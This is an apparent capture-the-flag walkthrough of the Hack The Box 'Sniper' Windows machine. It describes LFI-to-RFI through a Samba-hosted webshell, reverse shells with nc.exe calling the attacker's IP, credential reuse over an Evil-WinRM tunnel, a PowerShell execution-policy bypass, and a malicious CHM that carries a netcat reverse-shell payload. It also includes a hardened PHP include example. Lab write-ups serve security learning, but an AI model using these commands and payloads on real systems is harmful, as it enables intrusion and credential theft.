→ Sniper is another Windows machine that can be accessed in an unintended way. The PHP web application was meant to be vulnerable to LFI (Local File Inclusion) escalating to RFI (Remote File Inclusion). Since this is a Windows box, I set up a Samba share, used the RFI to include my webshell, and uploaded an executable to get a reverse shell back to my Kali Linux machine. During reconnaissance I found a file related to user credentials that had to be converted to plaintext and then used with the executable I uploaded. The machine creator left a notes.txt in the user's file directory, which is a good enough hint. Creating a malicious payload on my host with PowerShell was not easy, as Windows kept rejecting the script file, but I eventually managed to create a malicious CHM file and got Administrator.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ Enumerate the SMB at port 445
→ Bruteforce the Web page directories
Post - Exploitation
→ Enumerate the page with Local File Inclusion
→ Setup SAMBA SHARE and upload a webshell
→ Using the AccessChk tool provided by Microsoft to check the access rights of the account "Chris"
→ Retrieve user credentials from Web page directories in inetpub
Exploitation
→ Method #1: Look for a listening port that can be used for port forwarding and log in as Chris using Evil-WinRM
→ Method #2: Convert the password hash into plaintext with PowerShell and execute nc.exe to get a reverse shell
→ Transfer the payload to the Sniper machine's C:\Docs directory, where the Administrator will check and open it
→ Set up a netcat listener and
→ Gain the Administrator shell
Network Scanning
Walkthrough
→ First, I run Nmap to scan the target and get information about the various services running on the target machine. I use:
-sV ⇒ Probe open ports to determine service/version info
-sC ⇒ equivalent to --script=default
-T 0-5 ⇒ Set timing template - higher is faster (less accurate)
-p- ⇒ Scan all 65535 ports
-oN ⇒ to save our scan results to a text file
```sh
root in htb/boxes/Sniper ❯ nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-26 23:52 PST
Nmap scan report for 10.10.10.151
Host is up (0.22s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 562.35 seconds
root in htb/boxes/Sniper took 9m22s ❯
```
Nmap results
So these ports are open:
80 ⇒ which basically hosts a web page
135 ⇒ running Windows RPC
139 ⇒ running Microsoft Windows netbios-ssn
445 ⇒ the default SMB port
49667 ⇒ running Windows RPC too
Enumeration
The first thing I did was connect to the machine with smbclient on port 445 and try an anonymous login, but it seems I am not allowed to do that.
```bash
root in htb/boxes/Sniper ❯ smbclient -L 10.10.10.151 -U ""
Enter WORKGROUP\'s password:
session setup failed: NT_STATUS_LOGON_FAILURE
root in htb/boxes/Sniper took 3s ❯
```
Next, I use enum4linux (a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts), but that does not work either.
```sh
root in htb/boxes/Sniper ❯ enum4linux -o -U -G -S -P 10.10.10.151
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 28 03:56:55 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.151    |
 ====================================================
[E] Can't find workgroup/domain

 =====================================
|    Session Check on 10.10.10.151    |
 =====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
root in htb/boxes/Sniper took 11s ❯
```
Scan Web page directories
So I will leave enumerating this machine for a while and try to enumerate what is on the web page. I use the dirsearch web path scanner to see if I can find anything useful,
and there is a login page at /user/login.php which caught my attention.
I tried admin:admin as username and password, and it redirected me to an Under Construction page.
I realized this page is just a rabbit hole: I can't find any hints in the page source, so I try to enumerate the whole Sniper site at http://10.10.10.151
Post - Exploitation
LFI | Local File Inclusion
After enumerating the web page some more, I found an interesting section under Services: there is a link there that you can use to change the language. What is more interesting is that, unlike other websites where you right-click and translate the page, a PHP file is assigned to pick the language for you.
When I inject a single ' into lang=blog-en.php it returns something like this, which suggests it is vulnerable to an LFI (Local File Inclusion) attack.
To confirm that this website is vulnerable to LFI I set the "lang=" parameter to ⇒ \windows\system32\drivers\etc\hosts
Looking at the page source, we can see the contents of the hosts file.
RFI | Remote File Inclusion
So I searched Google for an LFI-to-RFI article and found a pretty good one. It helped me inject a webshell and get into the machine.
I set up my Samba share based on the article with this configuration in /etc/samba/smb.conf:
```ini
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = Payas0
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[medz]
path = /root/htb/boxes/Sniper/
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```
Now everything looks fine, so I restart Samba and do the RFI. To take control of the web server I use the Winter WebShell so I can upload my payload and execute a reverse shell; I point the parameter at my share, lang=\\10.10.14.216\medz\shell.php, then make a custom directory at C:
```bash
service smbd restart
```
Create a folder named payas0
Looks good! Then I upload nc.exe to C:\payas0
Now everything is set: I execute nc.exe with my IP and port 9001 and pop a PowerShell
```sh
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 50340
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
```
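The `lang` include abused in the LFI section above, and here again through the UNC path to my Samba share, comes down to one PHP pattern. As an added example (not the box's actual source code), here is that pattern written the vulnerable way next to a hardened version; the file names and the `lang` directory are assumptions.

```php
<?php
// Added example, not the Sniper site's own code. File names and the
// directory layout are assumptions chosen to mirror the lang=blog-en.php
// parameter seen on the box.

// UNSAFE: the request parameter becomes the include path. This is the LFI
// (lang=\windows\system32\drivers\etc\hosts) and, because PHP on Windows
// treats \\host\share\file.php as a filesystem path, also the RFI via SMB
// (lang=\\10.10.14.216\medz\shell.php) without allow_url_include enabled.
function includeLanguageUnsafe(string $lang): void
{
    include $lang;
}

// HARDENED: the parameter is only a key into a fixed table; the path that
// gets included is never built from request data.
const LANGUAGE_FILES = [
    'en' => 'blog-en.php',
    'es' => 'blog-es.php',
];

function resolveLanguageFile(string $lang, string $langDir): ?string
{
    if (!array_key_exists($lang, LANGUAGE_FILES)) {
        return null;                       // unknown key: refuse
    }
    $base = realpath($langDir);
    $path = realpath($langDir . DIRECTORY_SEPARATOR . LANGUAGE_FILES[$lang]);
    if ($base === false || $path === false) {
        return null;                       // directory or file missing
    }
    // Defence in depth: the resolved file must still sit under $langDir.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$file = resolveLanguageFile($_GET['lang'] ?? 'en', __DIR__ . '/lang');
if ($file === null) {
    http_response_code(400);
    exit('Unsupported language');
}
include $file;
```

With the hardened version, both the single quote and the UNC path the walkthrough sends in `lang=` fail the table lookup and get a 400 instead of reaching `include`.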
Second, I visit the inetpub directory where the website and its source code are installed. I'm lucky: there is an interesting file at C:\inetpub\wwwroot\user\db.php which contains user credentials.
The DB connection string found in db.php confirmed that the creds belong to user Chris.
Exploitation
Privilege Escalation to user Chris
Method #1
I was thinking I could use those creds over WinRM with Evil-WinRM (after checking listening ports with netstat -ano) and get user.txt.
We can use port 5985 for port forwarding and log in as Chris, but before that I upload the plink.exe Windows binary to Sniper and create a tunnel so I can reach that port from my machine:
```powershell
PS C:\payas0> .\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:5985 10.10.14.216
.\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:5985 10.10.14.216
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 81:c9:32:5d:2e:03:3c:1d:72:8a:54:45:ed:0b:08:4b
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Linux Payas0 5.4.0-kali2-amd64 #1 SMP Debian 5.4.8-1kali1 (2020-01-06) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 28 05:30:42 2020 from 10.10.10.151
Could not chdir to home directory /home/nulldev: No such file or directory
$ whoami
whoami
nulldev
$ su root
Password: "------------"
nulldev on Payas0 ❯
```
Now that the tunnel is created, I try to log in as user Chris using the dbuser password and get user.txt.
```powershell
nulldev on Payas0 in evil-winrm on master via 💎 v2.5.7 ❯ ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./
ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chris\Documents> cd ..
*Evil-WinRM* PS C:\Users> dir
dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/9/2019   6:47 AM                Administrator
d-----        4/11/2019   7:04 AM                Chris
d-r---         4/9/2019   6:47 AM                Public


*Evil-WinRM* PS C:\Users> cd Chris\Desktop
cd Chris\Desktop
*Evil-WinRM* PS C:\Users\Chris\Desktop> dir
dir


    Directory: C:\Users\Chris\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:15 AM             32 user.txt


*Evil-WinRM* PS C:\Users\Chris\Desktop> more user.txt
more user.txt
21f4[----------------------]cf56e
*Evil-WinRM* PS C:\Users\Chris\Desktop>
```
Method #2
Yes, there is a method #2 to get user.txt, and it is less hassle than port forwarding with PowerShell. First I grant permissions on my payas0 folder, then set up a netcat listener on my Kali with nc -lnvp 4444:
After executing the last command I have a shell again (2nd shell), and this one looks better.
```bash
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 49835
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
```
Enumeration begins again, but this time it is pretty easy as the stuff I need is all in the basic directories. In C:\Docs there is a note.txt left by our "Boss" that says:
```powershell
C:\Users\Chris\Desktop>cd \Docs
cd \Docs

C:\Docs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Docs

03/28/2020  12:46 AM    <DIR>          .
03/28/2020  12:46 AM    <DIR>          ..
04/11/2019  09:31 AM               285 note.txt
04/11/2019  09:17 AM           552,607 php for dummies-trial.pdf
               2 File(s)        552,892 bytes
               2 Dir(s)  17,953,026,048 bytes free
```
Note.txt
What’s on the note.txt ? Well this:
```powershell
C:\Docs>more note.txt
more note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

C:\Docs>
```
So the hint is in the note ⇒ "the documentation for the new app, drop it here when you're done with it." So there is a file here which the Administrator will check and open.
CHM File
Next, in the C:\Users\Chris\Downloads directory there is a CHM file.
```powershell
C:\Docs>cd \Users\Chris\Downloads
cd \Users\Chris\Downloads

C:\Users\Chris\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640
```
To view the CHM file you need to open it on Windows, so I transferred it to my Windows machine; it is precisely the documentation for the app requested by the Sniper CEO:
The Administrator will check the CHM and open it, and then the payload will trigger.
This one was new to me; I had never dealt with CHM files, so I did some research and found that you can create a malicious CHM file with Nishang using Out-CHM.ps1.
I first tried to download Out-CHM.ps1 on my Windows machine, but it was rejected because it is flagged as a virus. Creating a malicious CHM file was a real pain, as Windows kept denying it even when I disabled Windows security for a while; PowerShell always rejected it.
```powershell
PS C:\Users\Medz\Documents\sniper> import-module Out-CHM.ps1
..\Out-CHM.ps1 : The term 'Out-CHM.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ..\Out-CHM.ps1
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Out-CHM.ps1:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

PS C:\Users\Medz\Documents\sniper>
```
But I managed to get around it using powershell -ep bypass:
```powershell
PS C:\Users\Medz\Documents\sniper> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Medz\Documents\sniper>
```
Before generating a CHM file we need to download HTML Help Workshop from Microsoft and run/install htmlhelp.exe. This creates the folder C:\Program Files (x86)\HTML Help Workshop with the programs needed to build the malicious .chm file.
And finally, I can create the CHM file.
```powershell
PS C:\Users\Medz\Documents\sniper> import-module .\Out-CHM.ps1
PS C:\Users\Medz\Documents\sniper> Out-CHM -Payload "C:\payas0\nc.exe 10.10.14.216 1234 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\Medz\Documents\sniper\doc.chm


Compile time: 0 minutes, 0 seconds
2       Topics
4       Local links
4       Internet links
0       Graphics


Created c:\Users\Medz\Documents\sniper\doc.chm, 13,448 bytes
Compression increased file by 280 bytes.
PS C:\Users\Medz\Documents\sniper> dir


    Directory: C:\Users\Medz\Documents\sniper


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/30/2019  10:58 PM                Basic Linux Privilege Escalation_files
-a----        6/30/2019  10:58 PM          56717 Basic Linux Privilege Escalation.html
-a----        3/29/2020   3:20 AM          13448 doc.chm
-a----        3/29/2020   3:05 AM          19502 Out-CHM.ps1


PS C:\Users\Medz\Documents\sniper>
```
Gain the Administrator Shell
So it's done! Now I upload doc.chm to the C:\Docs directory on the Sniper machine.
```powershell
C:\Docs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Docs

03/28/2020  07:19 PM    <DIR>          .
03/28/2020  07:19 PM    <DIR>          ..
04/11/2019  09:31 AM               285 note.txt
04/11/2019  09:17 AM           552,607 php for dummies-trial.pdf
               2 File(s)        552,892 bytes
               2 Dir(s)  17,987,465,216 bytes free
```
Once doc.chm is in Docs, I set up a netcat listener on the port I used when generating the malicious CHM file. Now all I need to do is wait for the Administrator to check and open it.
Root
After 2-3 minutes I have the administrator shell ! Very nice box !
```bash
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.33] from (UNKNOWN) [10.10.10.151] 49703
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
```